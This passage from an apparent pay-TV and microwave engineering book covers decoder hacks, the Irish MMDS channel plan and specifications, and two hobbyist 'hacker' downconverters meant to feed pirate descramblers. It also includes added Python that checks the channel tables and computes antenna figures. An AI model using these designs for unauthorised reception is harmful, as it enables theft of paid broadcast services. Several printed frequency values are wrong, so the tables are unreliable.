the official decoder. 


The ORION decoders were effectively hacked using replacement EPROMs 
and other test chips. Some of the security circuitry in these decoders was 
potted in epoxy resin in an attempt to stop hackers getting to it. It was only a
minor inconvenience. 


These decoders use the embedded secure microcontroller principle. The 
access control data is transmitted in what would ordinarily be the vertical 
blanking interval. The security relies mainly on the difficulty of hacking the 
secure microcontroller in the decoder. 


Of course a more obvious vulnerability exists. The data has to get to the 
secure microcontroller. This is the aspect that was apparently hacked. On 
satellite, there is information that suggests that one of the satellite versions of
IRDETO, as used by TelePiu in Italy has been hacked using a PIC16C57. 
The PIC16C57 blocks turn-off data to the secure microcontroller in the 
official decoder. 


Theoretically, such a hack on the system could easily be ECMed. If the 
algorithm used to encrypt the over the air data is soft, (is held in EEPROM 
or RAM), it can be changed for a more secure version. This would allow the 
decoder to be upgraded over the air. The problem with this is that the 
general trend in decoder design, especially cable type decoders, is towards 
a customised version of an off the shelf microcontroller. The best example
of this is the secured microcontroller in the VideoCrypt decoder, which is actually a
customised Motorola 68705.


The main secure microcontroller in the CableCrypt decoder seems to be a 
custom device. The algorithm for the decryption of the over the air data may 
well be hardwired in the ROM of this microcontroller. 


While the system may give the impression of providing very high security, it 
is these simplistic hacks that have pockmarked the history of such systems. 
There is of course a trade-off between security and usability. 


IRDETO seems to market the idea that they can offer a cablenet or service 
a turnkey operation that takes care of everything. They take care of all the 
business and logistical operations but the fact that CableCrypt has been 
hacked does tend to question the part that security plays in the whole 
package. Perhaps it is a case of the "acceptable level of piracy" practice. 
Any cablenet is going to suffer some piracy therefore as long as this piracy 
can be kept at a safe level it is acceptable. 


Admittedly the formats of the system that were hacked were the initial 
versions. IRDETO may well have repaired the security mistakes that 
enabled the hacks to take place. 


It is my opinion that relying on a single particular approach, that of the 
Embedded Secure Microcontroller, is wrong and dangerous. This architecture,
especially in the closed environment of a cable system, has continually
proven to be vulnerable. 


What enabled these systems to be hacked is the fact that there is a 
Blackbox industry of hackers with the necessary skills, equipment and 
finance. Given that Europe is perhaps the most hostile piracy environment 
on the planet, there was no way that any system would remain secure for 
long. Fighting piracy by press release is not an option. 


The fact that the legislation may protect the cablenet is of little comfort when 
the system is hacked. The fact that this information may become available 
via the internet or BBSes is a particularly worrying thing. 
Section 2: Microwave Television


The Multichannel Multipoint Distribution System, (MMDS), otherwise known 
as microwave television, has been adopted by the Irish Department of 
Communications as a means to distribute television channels in areas that 
would be uneconomical to cable. 


The legitimate cable companies have made a considerable investment in 
their cablenets. With respect to the size of its population, Ireland is one of 
the most cabled countries in Europe. In the UK cable television has met with 
sporadic success. In Ireland, all the major cities are cabled. Even though the
subscribers may sometimes complain about the quality of the service they 
depend on the cablenet to supply their television viewing. If an MMDS 
transmitter service commenced within ten or twenty miles of the cablenet, 
some of the subscribers would purchase MMDS reception equipment. 
Depending on the proximity of the transmitter, a considerable percentage of 
the cablenet subscribers would opt for the MMDS. This would put the 
cablenet's financial future in danger and more importantly, it would put the 
jobs of the people working for the cablenet in danger. It is for this reason 
that the cablenets were offered the first chance at the areas surrounding 
their cablenets. 


With satellite television, the state monopoly has been smashed and the 
captive audience of RTE has disappeared. People in the areas as yet 
uncabled seem to want a choice of stations. The logical move was for 
satellite television but the UK terrestrial channels are not yet available on 
satellite. The pirate rebeam operators are taking the English terrestrial 
television channels and filling this market gap. MMDS was intended to 
eliminate these pirates and to introduce some sort of order into the 
broadcast situation. It did not. 


Full MMDS coverage of Ireland or any country cannot be achieved. While 
many areas will cover up to 75% of the franchise there will still be a need for 
fill-in stations. The most feasible type of fill-in station would be a short 
distance link to a communal antenna feeding a small cable system. This 
kind of system would place most of the engineering on ground familiar to 
the people who work for the cable companies. 


The frequency range for the new microwave television system will be 2.5 
GHz to 2.68 GHz. This frequency allocation differs from the American 
version. The American frequency range is from 2.15 GHz to 2.16 GHz and 
from 2.5 GHz to 2.68 GHz. 


The basic concept of the system is that each subscriber will have a rooftop 
antenna and microwave converter. The required channels will be transmitted
from a MMDS transmission installation. Each receiving antenna will
have to have a clear line-of-sight view of the transmitting antenna. 
Microwave signals are drastically attenuated by any obstructions such as 
trees, buildings and hills. 


One of the main attractions of the MMDS system is the small amount of 
power required to cover an area. It has been estimated that approximately 
one watt of RF power is required to give a mile of usable signal area. This 
implies that 100 miles could be covered using 100 Watts. This is a 
theoretical situation. In reality the areas are much smaller, typically the area 
being thirty or forty miles in diameter. This makes the prospect of direct 
substitution of the pirate rebeam operations more feasible. The main 
problem that the cable companies have with the pirates is the uncontrollable 
reception of the pirated signal. With microwaves, the creation of reception 
black spots is a lot easier than at UHF though in some cases their creation 
is totally non-intentional. 


The band is divided into odd and even channels. Odd channels are 
designated Group A and even channels are designated Group B. Each 
franchise is allocated odd or even channels. This ensures that there is a 
gap of 8 MHz between each channel on an MMDS net. 


Group A

Channel   Frequency Limits   Vision Carrier   Sound Carrier

01        2500 - 2508        2501.25          2507.25
03        2516 - 2524        2517.25          2525.25
05        2532 - 2540        2553.25          2539.25
07        2548 - 2556        2549.25          2555.25
09        2564 - 2572        2565.25          2571.25
11        2580 - 2588        2581.25          2587.25
13        2596 - 2604        2597.25          2603.25
15        2612 - 2620        2613.25          2619.25
17        2628 - 2636        2629.25          2635.25
19        2644 - 2652        2645.25          2651.25
21        2660 - 2668        2551.25          2667.25


All frequencies are in MHz.


An offset of 7.8125 KHz is permitted in some cases. This is to reduce the 
possibility of interference from other nets. The nets with offset frequencies 
are designated A+ and B+. 
The use of odd and even channels also opens the possibility of direct
downconversion to bands where existing RTE transmitters are operating.
The channels could theoretically coexist on the band with minimal
interference. This would be a theoretical rather than practical possibility.


Group B

Channel   Frequency Limits   Vision Carrier   Sound Carrier

02        2508 - 2516        2509.25          2515.25
04        2524 - 2552        2517.25          2551.25
06        2540 - 2548        2533.25          2547.25
08        2556 - 2564        2549.25          2563.25
10        2572 - 2580        2565.25          2579.25
12        2588 - 2596        2581.25          2595.25
14        2604 - 2612        2597.25          2611.25
16        2620 - 2628        2615.25          2627.25
18        2656 - 2644        2629.25          2645.25
20        2652 - 2660        2645.25          2659.25
22        2668 - 2676        2331.25          2675.25


All frequencies are in MHz.
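A channel plan generator and a consistency check for the two tables above, as an added example (written for this edition, not code from the book or from any MMDS operator). The generator assumes that every channel follows the pattern visible in channel 01: an 8 MHz raster from 2500 MHz, vision carrier 1.25 MHz above the lower limit, sound carrier 0.75 MHz below the upper limit. The tables are reproduced exactly as printed so the check can list the rows that do not fit that pattern; the rows it flags are presumably typesetting or scanning errors, and the printed values are left as they are here.

```python
"""Channel plan generator and a consistency check for the 2.5-2.68 GHz
MMDS band described above. Added example, not code from the book.
Assumption: every channel follows the pattern of channel 01 in the printed
table, i.e. an 8 MHz raster from 2500 MHz with the vision carrier 1.25 MHz
above the lower limit and the sound carrier 0.75 MHz below the upper limit
(6 MHz vision-to-sound spacing). Odd channels form Group A, even channels
Group B. PRINTED is the table as it appears on the page, reproduced so the
check can show which rows do not fit the pattern."""

BAND_START_MHZ = 2500.0
CHANNEL_WIDTH_MHZ = 8.0
VISION_OFFSET_MHZ = 1.25
SOUND_BELOW_UPPER_MHZ = 0.75
NET_OFFSET_MHZ = 7.8125 / 1000.0  # the A+/B+ offset, 7.8125 KHz


def channel_plan(ch):
    """(lower, upper, vision, sound) in MHz for channel number ch."""
    lower = BAND_START_MHZ + CHANNEL_WIDTH_MHZ * (ch - 1)
    upper = lower + CHANNEL_WIDTH_MHZ
    return (lower, upper, lower + VISION_OFFSET_MHZ, upper - SOUND_BELOW_UPPER_MHZ)


def group(ch):
    """Odd channels are Group A, even channels Group B."""
    return "A" if ch % 2 else "B"


def offset_carriers(ch):
    """Vision and sound carriers for an A+/B+ net using the permitted offset."""
    _, _, vision, sound = channel_plan(ch)
    return (vision + NET_OFFSET_MHZ, sound + NET_OFFSET_MHZ)


def gap_to_next_in_group(ch):
    """Spacing between a channel's upper limit and the next channel of the
    same group: the 8 MHz gap the odd/even allocation guarantees."""
    return channel_plan(ch + 2)[0] - channel_plan(ch)[1]


# The two tables exactly as printed on the page (MHz).
PRINTED = {
    1: (2500, 2508, 2501.25, 2507.25), 3: (2516, 2524, 2517.25, 2525.25),
    5: (2532, 2540, 2553.25, 2539.25), 7: (2548, 2556, 2549.25, 2555.25),
    9: (2564, 2572, 2565.25, 2571.25), 11: (2580, 2588, 2581.25, 2587.25),
    13: (2596, 2604, 2597.25, 2603.25), 15: (2612, 2620, 2613.25, 2619.25),
    17: (2628, 2636, 2629.25, 2635.25), 19: (2644, 2652, 2645.25, 2651.25),
    21: (2660, 2668, 2551.25, 2667.25),
    2: (2508, 2516, 2509.25, 2515.25), 4: (2524, 2552, 2517.25, 2551.25),
    6: (2540, 2548, 2533.25, 2547.25), 8: (2556, 2564, 2549.25, 2563.25),
    10: (2572, 2580, 2565.25, 2579.25), 12: (2588, 2596, 2581.25, 2595.25),
    14: (2604, 2612, 2597.25, 2611.25), 16: (2620, 2628, 2615.25, 2627.25),
    18: (2656, 2644, 2629.25, 2645.25), 20: (2652, 2660, 2645.25, 2659.25),
    22: (2668, 2676, 2331.25, 2675.25),
}

FIELDS = ("lower", "upper", "vision", "sound")


def check_printed_table(printed=PRINTED):
    """{channel: [(field, printed_value, expected_value), ...]} for every
    row that deviates from the plan; an empty dict means the table is
    self-consistent."""
    problems = {}
    for ch, row in sorted(printed.items()):
        diffs = [(f, p, e) for f, p, e in zip(FIELDS, row, channel_plan(ch))
                 if abs(p - e) > 1e-6]
        if diffs:
            problems[ch] = diffs
    return problems


if __name__ == "__main__":
    for ch, diffs in check_printed_table().items():
        print(f"channel {ch:02d} (group {group(ch)}):", diffs)
```

Run as a script it lists thirteen rows that disagree with the pattern, most of them Group B vision carriers printed 8 MHz low; the Group A rows for channels 01, 07 and 09 through 19 and the Group B row for channel 02 fit the plan exactly.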


The concept of MMDS is to supply a number of installations via an 
omnidirectional transmitting antenna. The franchises are defined by a 
transmission radius. 


The transmitting equipment is standard MMDS transmission equipment. 
The frequency tolerance is +/- 500 Hz. This tolerance can easily be 
achieved by use of a crystal oven. The transmitters have to be synthesised 
to maintain this tolerance over all channels on a net. 


The minimum signal level at the edge of the franchise is 45dB. The 
maximum effective isotropic radiated power allowed for this performance is 
32 dBW. The EIRP is the transmitter output multiplied by the antenna gain. 
The antenna gain in this case is referred to an isotropic radiator. An 
isotropic radiator is a point in space that radiates equally in all directions. 


The height of the transmitting antenna is calculated by measuring its height 
above the average ground level between three and fifteen kilometres 
distance from the antenna. This procedure is carried out for eighteen 
radials. The starting radial is at true North and the angular distance between 
each radial is twenty degrees. The effective height of the antenna is the
worst value obtained from this procedure. 


The field strength at the edge of the franchise is not supposed to exceed 
66dBuV/M. The EIRP of the transmitter will be adjusted to achieve this 
value. In order to avoid interference to other nets, the maximum antenna 
height for full power transmissions is two hundred metres. The EIRP will 
have to be reduced by 1 dB for every twenty five metres up to a maximum of 
5 dB at the maximum height of three hundred and twenty five metres. 


The reception specifications for the system detail a 6 dB noise figure for the 
receiver. This figure is easily achieved using GaAsFETs. A noise figure of 4
dB could be reached by using some of the cheaper silicon high frequency 
transistors. 


The output impedance of the receiver is 75R in order to match the input 
impedance of the television. The permitted output blocks are as follows. 


Band I       47 MHz - 68 MHz      21 MHz Block
Band III     174 MHz - 230 MHz    56 MHz Block
Band IV/V    470 MHz - 862 MHz    392 MHz Block


In the official receivers, no overlap of local RTE transmitters is allowed. A 
bypass circuit to allow the subscriber to switch between MMDS channels 
and off-air channels has to be provided in the design. The official receiver 
also has to comply with the relevant electrical safety regulations. The RF 
output level has to be 60 dBuV with a tolerance of +12 dB or -6 dB. 


The receiver specification is generous. The noise figure specification can 
easily be reached by a number of techniques. The output blocks may 
provide a problem. For the lower blocks, the receiver will have to have a 
variable local oscillator. This adds to the overall cost of the receiver. The 
UHF block provides the most promise as the full MMDS block can be block 
downconverted to UHF. 


The antenna specification is similarly generous. The recommended gain of 
the receiving antenna is 22 dBi with a front to back ratio of 20 dB. The 
orthogonal polarisation discrimination on the main lobe is 19dB. The 
diameter of a parabolic antenna with this gain at 2500 MHz and with an 
efficiency of 55% is 64.84 centimetres.
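The transmitter and antenna figures quoted in the preceding paragraphs, worked through as an added example (written for this edition, not code from the book or from any regulator's specification). The relations used are the standard ones: EIRP in dBW is transmitter power in dBW plus antenna gain in dBi, and a parabolic reflector's gain is the aperture efficiency times (πD/λ)². The height derating follows the rule stated above (full power up to 200 m, 1 dB less for every 25 m, capped at 5 dB at 325 m); rounding a started 25 m step up to a whole dB is an assumption made here. The dish calculation returns 64.8 cm rather than the 64.84 cm printed above because it uses the exact speed of light rather than 3×10^8 m/s.

```python
"""Link-planning arithmetic for the MMDS transmitter and receiving antenna
figures quoted above. Added example, not code from the book. Standard
relations: EIRP(dBW) = 10 log10(P in W) + G(dBi); parabolic gain
G = eta * (pi * D / lambda)^2. The height derating implements the rule in
the text (full power up to 200 m, 1 dB less for every 25 m above that,
capped at 5 dB at 325 m); rounding each started 25 m step up to a whole dB
is an assumption made here."""

import math

C = 299_792_458.0  # m/s
EIRP_LIMIT_DBW = 32.0


def eirp_dbw(tx_power_w, antenna_gain_dbi):
    """Effective isotropic radiated power of a transmitter/antenna pair."""
    return 10.0 * math.log10(tx_power_w) + antenna_gain_dbi


def tx_power_for_eirp_w(eirp_target_dbw, antenna_gain_dbi):
    """Transmitter output needed to reach a given EIRP with a given antenna."""
    return 10.0 ** ((eirp_target_dbw - antenna_gain_dbi) / 10.0)


def height_derating_db(height_m, full_power_height_m=200.0,
                       step_m=25.0, db_per_step=1.0, max_db=5.0):
    """EIRP reduction required for an antenna above the full-power height."""
    if height_m <= full_power_height_m:
        return 0.0
    steps = math.ceil((height_m - full_power_height_m) / step_m)
    return min(steps * db_per_step, max_db)


def max_eirp_dbw(height_m):
    """Permitted EIRP for a transmitting antenna at the given effective height."""
    return EIRP_LIMIT_DBW - height_derating_db(height_m)


def parabolic_gain_dbi(diameter_m, freq_hz, efficiency):
    """Gain of a parabolic reflector relative to an isotropic radiator."""
    lam = C / freq_hz
    return 10.0 * math.log10(efficiency * (math.pi * diameter_m / lam) ** 2)


def parabolic_diameter_m(gain_dbi, freq_hz, efficiency):
    """Dish diameter needed for a given gain: inverts parabolic_gain_dbi."""
    lam = C / freq_hz
    g = 10.0 ** (gain_dbi / 10.0)
    return lam / math.pi * math.sqrt(g / efficiency)


def receive_dish_spec(gain_dbi=22.0, freq_hz=2.5e9, efficiency=0.55):
    """The receiving antenna case from the text: 22 dBi at 2500 MHz with
    55% efficiency comes out at roughly 65 cm."""
    d = parabolic_diameter_m(gain_dbi, freq_hz, efficiency)
    return {"diameter_cm": round(d * 100, 1),
            "check_gain_dbi": round(parabolic_gain_dbi(d, freq_hz, efficiency), 2)}


if __name__ == "__main__":
    print("receive dish:", receive_dish_spec())
    for h in (150, 200, 210, 250, 325, 400):
        limit = max_eirp_dbw(h)
        print(f"antenna at {h} m: max EIRP {limit:.0f} dBW,"
              f" {tx_power_for_eirp_w(limit, 12.0):.1f} W into a 12 dBi antenna")
```

The 12 dBi transmitting antenna in the script's loop is a constructed figure; the point of the loop is that the same 32 dBW ceiling translates into very different transmitter powers depending on antenna gain and height, which is why the specification is written in EIRP rather than in watts.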


The only cablenet in Ireland that seems to have adopted blanket scrambling 
of channels is the Cork cablenet. The other cablenets are partially 
scrambled. The same pattern is being repeated on the MMDS networks. 
This has led to problems as there is piracy on these MMDS networks. Most 
of the piracy originates from third party MMDS downconverters rather than
hackers making their own downconverters. 


The Irish Broadcasting Act 1990 clearly makes piracy a crime. If you wish to 
experiment get permission. Hacking MMDS is not the same as satellite 
hacking. The risks are too great. This may sound like heresy but part of 
being a good hacker is knowing when to hack. 


The cable companies in Ireland are relatively new to the field of microwave 
engineering. Most of the present hackers have been involved in satellite 
television from the early days. In the early days, the only band worth 
experimenting with was C-Band. The cost of microwave integrated circuits 
from the United States was too high for most. The alternative was to use 
“home brew” converters and amplifiers. The Antiparallel Diode Mixer and 
the 3 dB Hybrid Mixer were two of the commonest designs used by the 
experimenters. These designs were built using microstrip etched on 
standard G-10 fibreglass board. The advantage of the antiparallel diode 
mixer was that the local oscillator frequency was half that which would have 
been required by a standard mixer. 


In order to have a tunable IF block, the C-Band Block was converted down 
to UHF, (470 to 870 MHz). This did not cover the full C-Band block and as a 
result the microwave oscillator had to be retuned depending on the section 
of the block required. A standard UHF tuner was then used to tune this 
converted block. 


As can be seen from the hacker downconverters, the whole system is 
financially insecure. The actual cost of the hacker converter is in the region 
of ten pounds. The cost of the microwave antenna would be approximately 
the same. The cable companies will probably have to charge a fee in the 
region of two to three hundred pounds per annum. A commercial pirate 
design could be manufactured and sold for about one hundred and fifty 
pounds. This would destabilise the cable companies and microwave 
companies who have not scrambled their signal. Of course the problem of 
legality enters into the equation. It is safer to hack satellite channels as there 
is less likelihood of being caught. 


Lumped Microstrip Components


The concept of an MMDS receiver system is not very different from the 
C-Band downconverter. The MMDS block has to be downconverted to UHF 
for use by a UHF tuner. No further processing is required as the 
transmission format is AM VSB. This means that the downconverted MMDS 
signal can be used by an ordinary television unless the signal is scrambled. 
Most of the circuits at MMDS frequencies use microstrip components
instead of discrete components. Microstrip is a circuit element in which the
properties of a piece of printed circuit board track are used to simulate a
discrete component. This is a cheaper option as the value of the component
can be controlled through the manufacturing process. The value of the
component does not change drastically from board to board.


A piece of printed circuit board track on a double sided printed circuit board, 
with one side acting as a ground plane, operating at a given frequency has 
resistance, inductance and capacitance. It also has a frequency dependent 
property of impedance. 


The inductance of the piece of track is mainly affected by the thickness of 
the conductor, the width of the conductor and the length of the conductor. 
The capacitance of the track is mainly affected by the thickness of the 
printed circuit board material and the area of the conductor. 


By using the properties of a piece of track, passive components can be 
fabricated. Individual capacitors can be formed by interdigitating two pieces 
of track. The ends of each piece of track are shaped like fingers so that they 
interlock but do not touch. The gaps between each finger or digit provide a 
repeatable amount of capacitance. 


The value of the capacitance is usually in the region of fractions of a 
picofarad. It is an easy way out when there is no conventional component 
that can be used. The commonest applications are matching networks and 
filters. 


Inductors can also be easily and repeatably fabricated. In their simplest 
form they are fabricated from thin tracks. The tracks can be spiraled to 
increase the inductance achievable in a given area. When drafting inductors 
in microstrip, it is easier to draw lines than spirals. The spirals are "squared" 
to make them easier to draw or plot. The squared spiral also provides more 
inductance per area than the spiral. 


Some of the higher quality PCB design programs have microstrip component 
libraries. While it is easy to use a PCB CAD package that will do the 
calculations and plot the boards, many of the top hackers prefer to draft the 
boards by hand. The rationale behind this is simple. Any fresh faced 
university graduate can use a CAD package but only a real designer can do 
it in their head. A well designed microstrip board is a work of art and the 
essence of art lies in the mind rather than in the brush. 
[Figure: Microstrip Components]

Microstrip cross section: the conductor (microstrip) sits on top of the 
dielectric (substrate), with the unetched copper of the other side of the 
board acting as the groundplane.

Interdigitated capacitor: the interdigitated capacitor is formed from two 
pieces of microstrip track. The value of such capacitors is typically below 
10pF.

Squared spiral inductor, with a bonding wire connecting to the microstrip 
track. The track impedance is typically above 120R.


8-37 


8: Cable And Microwave Distribution 


The Antiparallel Diode Mixer 


The antiparallel diode mixer has the unconventional characteristic of 
requiring a local oscillator running at half the normal frequency. 


The mixer consists of two microstrip resonators and two Schottky barrier 
diodes. With reference to the diagram, A is an open circuited half 
wavelength line at the signal frequency. The intermediate frequency is taken 
from the midpoint of this line. The other line is a short circuited quarter 
wavelength at the normal oscillator frequency. 


The oscillator level required for this mixer is 0 dBmV. The isolation between 
the RF port and the local oscillator port is good. The mixer does require 
some preamplification ahead of it and some filtering after it. 


This design was used in many of the commercial C-Band downconverters in 
the US. It is very easy to fabricate and as such this should make it popular 
with hackers. It is used as part of the second hacker downconverter detailed 
later in the chapter. 


The Ratrace or 3 dB Hybrid Mixer 


The ratrace mixer is essentially a balanced mixer. By counting the number 
of quarter wavelength phase shifts in each signal path it can be seen that 
the signal and local oscillator waves arrive at each diode in antiphase with 
each other. The signal power and the local oscillator power are coupled to 
the mixer diodes with low loss. This makes the mixer more sensitive and 
less lossy. 


The mixer is wideband and as a result it requires some form of filtering on 
the output. The minimum filter is a quarter wavelength open circuited stub. 
The stub length is a quarter wavelength at the signal frequency and as such 
attenuates any microwave signals at the output of the mixer. Ideally a low 
pass filter for the required output passband should be designed. 


The noise figure of the mixer is relatively low. Figures of 4 dB to 7 dB have 
been quoted for C-Band. The loss of the mixer is in the region of 6 dB to 9 
dB. The noise figure of the mixer is not as critical as the noise figure of the 
preamplifier. In this case, the signal levels require some amplification prior 
to mixing. 


The Image Rejection Mixer 


[Figure: Microstrip Mixer Circuits]

When the intermediate frequency is low, the converter is more prone to 
interference from the image frequency signals. The standard IF of most of 
the first and second generation C-Band satellite television receivers was 70 
MHz. This meant that the image frequency response was 140 MHz away 
from the signal frequency. The image frequency was within the C-Band 
block. The image rejection filter was a clever use of phase shifts to cancel 
the image frequency components. 


The incoming signal was split and phase shifted by 90 degrees in the first 3 
dB coupler. The two signals were then fed to two ratrace mixers. These 
mixers were fed from the same oscillator. The outputs from the two ratrace 
mixers were then combined and the out of phase components canceled. 


While this design has been popular with C-Band users, its use in the United 
States by MMDS hackers has been limited. This is due to the relatively large 
PCB area required. Most designs are based on the standard G10 fibreglass 
board. This has a dielectric constant of 4.7 to 5. A reduction in size could be 
achieved by using a board with a higher dielectric constant. The problem is 
that the cost of the board material also increases. 


The MMDS system as it stands is totally insecure. The ease with which it 
can be hacked must give some of the MMDS operators nightmares. To 
hack this system, the hacker has to convert the block in use down to UHF or 
VHF. Researchers have obtained usable bandwidths of 50% of the centre 
frequency from the 3 dB Hybrid mixer. This would make it a good choice for 
use in a downconverter. A local oscillator for the Irish system would be 
running at a frequency of about 2.0 GHz. This would convert the block down 
to UHF tuner range. A simple one transistor fixed frequency oscillator could 
be used to provide the conversion oscillator. 


The Hacker MMDS Downconverter 1 


This section, as they say, is included purely for informational purposes only. 
The author and the publishers accept no responsibility for the use or misuse 
of the information by the reader. 


This design is based on an American design of 1982 vintage. It is a single 
downconversion type with its output on US Channel 3, (61.25 MHz). The 
rationale of choosing this output frequency is that it can be directly 
interfaced with pirate descrambler designs for the scrambling systems in 
use on MMDS. However with the current trend towards hard systems such 
as Cryptovision, this is not that relevant any more. Of course with the 
simpler systems such as the Jerrold Tri-Mode, a pirate descrambler could 
be built. 


The components used in the design are readily available. The original 
design used the MRF901 transistor. The BFR90, BFR91, BFR34A transistors 
can be substituted for this transistor. The BFR91 would be a better 
choice for the oscillator transistor as it has a higher current handling 
capacity. 

[Figure: Hacker MMDS Converter 1 Local Oscillator Tuning]
Trim base line for correct local oscillator frequency. During tuning 
procedure Vcc = 14 Volts. In the event of cutting the base line too short, 
the local oscillator frequency will be too high. If this is the case use the 
same technique employed in the tuning of the Hacker Converter 2 local 
oscillator.


The preamplifier amplifies the incoming MMDS signal to a usable level. By 
using stubs, some filtering of the input is carried out prior to mixing. The 
BFR90 can be replaced with a microwave transistor if you are willing to do 
some experimenting. The increase in quality is sometimes worth the cost. 


The mixer is the standard 3 dB hybrid (ratrace) mixer described earlier: the 
signal and local oscillator waves arrive at each diode in antiphase with 
each other and both are coupled to the diodes with low loss, which makes 
the mixer more sensitive and less lossy. The diodes are biased on to provide 
greater sensitivity. The output of the mixer has a wide low impedance stub 
to act as a lowpass filter. The filtered intermediate frequency is then fed to 
the output amplifier. The output amplifier is wideband. A UHF band filter 
and amplifier could be used at this point instead of the output amplifier. 


The oscillator output is taken from the base of the oscillator transistor. The 
oscillator output is fed to the mixer by use of a directional coupler. The 
amount of oscillator power reaching the mixer is controlled by the distance 
between the microstrip tracks on the board. The end of the input track to the 
mixer is taken to ground by a 51R resistor. This is to balance the ports of 
the mixer. For temperature stability, a diode chain is included in the 
oscillator. The drift factor of the local oscillator is approximately 0.17 MHz 
per degree Centigrade. 


The operating range of the local oscillator is set by trimming the base line of 
the oscillator transistor with the supply voltage set to 14 Volts. The supply 
range can be varied over the 12V to 16V range. 


The Hacker MMDS Downconverter 2 


This design originally appeared in the Pink And Brown Book. The Pink And 
Brown Book was published in May 1986. The design had its origins in 2300 
MHz amateur radio equipment. The power supply as published was a 
biohazard as the fuse was in the wrong position. This fault has been 
corrected in the version presented here. 


The input to the downconverter is DC shorted via two high impedance stubs 
which are earthed. A microstrip interdigitated capacitor is used to decouple 
the input of the microwave amplifier. A stub is used to tune the output of the 
microwave amplifier. The output of the amplifier is fed to the mixer via 
another microstrip interdigitated capacitor. 

[Figure: Hacker MMDS Converter 2 circuit diagrams (not legible in the scan)]

[Figure: Hacker MMDS Converter 2 PSU]
Legible labels: 110; L; 0A5; To TV; 4 x 1N4001; 7805 on heatsink; To 
Converter; 18V. Ensure that TV socket is isolated.

[Figure: Hacker MMDS Converter 2 Local Oscillator Tuning]
Trim this PCB track to set the required local oscillator frequency. During 
tuning procedure Vcc = 10 Volts. In the event of having cut the oscillator 
line too short, solder a 0.25" length of resistor lead offcut to the line and 
repeat the tuning procedure.


The mixer used in this design is an Antiparallel Diode Mixer. This allows the 
local oscillator to run at half the normal local oscillator frequency. The 
oscillator frequency is doubled in the mixer. The diodes used in the mixer 
are Schottky microwave diodes. 


The local oscillator is a simple one transistor design. A coarse adjustment of 
the oscillator frequency is performed by trimming the collector microstrip 
element. Channel selection is performed by varying the supply voltage 
between 6.0V and 14V. 


The output of the mixer is fed to a wideband amplifier. In the original design, 
the output frequency was 55 to 85 MHz. This is Band I and as such it is 
suitable for input to a VHF tuner strip. This would provide a baseband output 
for use with pirate descramblers. 


Oscillator Alignment 


The easiest way to set up the downconverter is by use of off-air signals. At 
the present, this is not possible. There is an alternative method. 


The irradiated tuned line method has been widely used by radio amateurs to 
set up microwave oscillators. A piece of copper wire (the inner wire of a 
coaxial cable) is stretched over a groundplane such as a piece of unetched 
PCB material. The distance between the wire and the groundplane is 
approximately 2 mm. 


One end of the wire is soldered to the ground plane. The other end is 
soldered to an OA91 or similar germanium diode. The other end of this 
diode is soldered to a 200 uA microammeter. 


The line is irradiated by the signal from the local oscillator. By sliding a 
screwdriver along the line, the meter will indicate a series of lows and highs. 
These readings correspond to the troughs and peaks of the signal. By 
measuring the distance between the peaks, the frequency of the oscillator 
can be calculated. The formula is expressed below. 


Fo = 15000/D 


Where Fo is the oscillator frequency in MegaHertz and D is the distance 
between troughs in Centimetres. 
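Where the constant comes from, as an added derivation rather than part of the 
original text: adjacent troughs (or adjacent peaks) of the standing wave on 
the shorted line are half a wavelength apart, so with $c = 3 \times 10^{10}$ cm/s

$$
\lambda = 2D, \qquad
F_o = \frac{c}{\lambda} = \frac{3 \times 10^{10}\ \mathrm{cm/s}}{2D\ \mathrm{cm}}
    = \frac{1.5 \times 10^{10}}{D}\ \mathrm{Hz} = \frac{15000}{D}\ \mathrm{MHz}.
$$

A trough spacing of $D = 7.5$ cm therefore indicates $F_o = 2000$ MHz.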
[Figure: Checking Microwave Oscillator Frequencies]
The frequency of a microwave oscillator can be measured by irradiating a 
tuned line and measuring the distance between troughs or between peaks 
on the meter readings. The screwdriver tunes the line by shorting it to 
ground.

F = 15000/D, where F is in MHz and D is in cm.

Labels: screwdriver; 100 uA full scale deflection meter; solder; copper clad 
PCB material (copper, dielectric); copper wire (TV coax inner).
MMDS Antenna Designs 


One of the best sources of antenna designs for MMDS is the RSGB VHF 
And UHF Manual. This book contains a number of antenna designs that are 
easily adapted for MMDS use. 


A number of antennas can be built for use with the hacker converter. The 
ones covered in this chapter are as follows; the parabolic dish, the corner 
reflector, the ring Yagi, the helical and the "ray gun". 


The Parabolic Reflector 


The parabolic antenna as used for satellite television reception can be used 
for MMDS. This is a rather expensive use of a dish. The reflective surface of 
a dish for use at MMDS can be mesh. The main factor governing the mesh 
gap is that it must be less than one eighth of the freespace wavelength of 
the lowest frequency of operation. Quarter inch wire mesh could be used. It 
is better to use the galvanised type rather than uncoated steel. The 
necessary formulae are given in the diagram. The gain of the parabolic 
depends on the diameter and the operational frequency. With the launch of 
Astra, smaller dishes will be widely available at a low cost. For a gain of 22 
dBi at 2.5 GHz, a 64 centimetre diameter dish is required. 


The Corner Reflector 


The corner reflector essentially consists of two parts; the dipole and the 
reflector. The reflector is simply an angled piece of metal sheet or metal 
mesh. The gain of the antenna depends on the angle of the reflector bend. 
A large number of the American designs that have been published have 
disregarded one essential fact: the feed impedance of the antenna. As the 
angle of the bend decreases, the gain increases but the feed impedance 
decreases. The easiest angle to match to is an angle in the region from 60 
to 90 degrees. The closer the angle is to 60 degrees the better. Matching is 
carried out by varying the distance of the feed dipole from the centre of the 
angle. This distance, measured in fractions of a wavelength, is marked S in 
the diagram. For a 50R match, the range of S for the 60 degree angle is 
0.41 to 0.49. For the 90 degree angle, the range is 0.3 to 0.35. 


This is the easiest antenna type to fabricate and as such it will be one of the 
most widely used. It does not have significant structural strength. It may not 
stand up to any severe winds. Therefore it would be better fabricated from 
wire mesh. 
[Figure: Parabolic Reflector]

Gain (dBi) = 10 log(n x (pi x D / λ)^2)
n = efficiency (typically 0.5)
λ = wavelength in metres
D = diameter in metres
f = focal distance
c = depth of curve
Equation of the curve: y^2 = 4fx
Focal length, f = D^2/16c

Materials: The surface accuracy of the reflector must be better than 1/8th 
of a wavelength at the lowest operating frequency. Chicken wire mesh can 
be used for the application.

There are a number of methods used to construct this antenna type. The 
simplest is to cut a template from plywood and then cut a number of ribs, 
normally eight, from a sheet of marine plywood. The ribs would then be 
assembled into a spider and the mesh attached with staples. A cheap 
satellite dish could also be used.
[Figure: The Corner Reflector]
Dimensions marked on the drawing: 18 cm, 9 cm, 7 cm, 7 cm, 3.8 cm.

Materials: The reflector is aluminium sheet. The dipole is 8 AWG copper 
wire. One section of the dipole is soldered to the centre pin of an N type or 
BNC type connector. The other section is soldered to the connector fixing 
nut.
The Ring Yagi Antenna 


